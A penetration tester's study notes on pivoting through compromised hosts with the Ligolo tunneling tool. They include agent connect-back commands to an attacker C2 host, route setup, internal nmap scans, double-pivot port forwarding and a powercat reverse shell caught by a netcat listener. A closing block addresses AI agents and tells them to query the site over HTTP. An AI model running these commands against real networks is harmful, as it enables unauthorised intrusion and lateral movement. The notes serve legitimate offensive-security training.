# Ligolo {% embed url="" %} {% embed url="" %} {% embed url="" %} ## Server (proxy) {% code title="setup" %} ```bash sudo ip tuntap add user [your_username] mode tun ligolo sudo ip link set ligolo up ip addr show ligolo ``` {% endcode %} {% code title="start server" %} ```bash ./proxy -laddr 0.0.0.0:3389 -selfcert ``` {% endcode %} {% hint style="info" %} choose a common port (3389, 25, 123) - default 11601 {% endhint %} ## Victim (agent) - single pivot ```bash ./agent -connect attacker_c2_server.com:53 -ignore-cert ``` ### Server after victim joining {% code title="@ligolo chk network config" %} ``` session 1 >> agent xx ifconfig ``` {% endcode %} {% hint style="info" %} in same 192.168.w\.0/24 subnet, victim has access to 192.168.x.0/24 {% endhint %} {% code title="add corr. network" %} ```bash sudo ip route add 172.16.x.0/24 dev ligolo ip route list ``` {% endcode %} {% code title="@ligolo session" %} ``` >> agent xx start ``` {% endcode %} ```bash nmap 192.168.x.0/24 ``` ## Victim 2 (2nd agent) - double pivot {% code title="in 2nd agent" overflow="wrap" %} ```bash ./agent -connect attacker_c2_server.com:53 -ignore-cert ``` {% endcode %} ### Server after victim joining {% code title="@ligolo chk network config" %} ```bash session 2 >> agent yy ifconfig ``` {% endcode %} {% hint style="info" %} the machine in 192.168.x.0/24 has access to 192.168.y.0/24 subnet {% endhint %} {% code title="add corr. network" %} ```bash sudo ip route add 192.168.y.0/24 dev ligolo ip route list ``` {% endcode %} {% code title="@ligolo session 1" %} ```bash stop session 2 >> agent yy start_tunnel ``` {% endcode %} {% hint style="info" %} able to switch tunnel simply by start in the 2nd session and choose to close the 1st tunnel via prompt {% endhint %} #### Port forward in 2nd agent to receive callback from 3rd victim victim 2 (agent 2) 25 traffics directing to attacker (server) 443 listener {% code title="@ligolo session 2" %} ```bash >> agent yy listener_add --addr 0.0.0.0:25 --to 127.0.0.1:443 --tcp listener_list listener_stop ``` {% endcode %} {% hint style="info" %} 192.168.y.0 subnet machine callback to 192.168.x.0:25 forward to kali at 192.168.w\.0:443 {% endhint %} ``` listener_add --addr 0.0.0.0:8081 --to 172.16.202.194:8081 --tcp ``` {% code title="in 192.168.w\.0 kali -" %} ``` nc -nlvp 443 ``` {% endcode %} {% code title="in 192.168.y.0 machine -" %} ``` powercat -c 192.168.x.0 -p 25 -ep ``` {% endcode %} ### Access agent's local port ```bash sudo ip route add 240.0.0.1/32 dev ligolo ``` ```bash nmap 240.0.0.1 ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://osnotes.jackielam.net/osep/network/ligolo.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.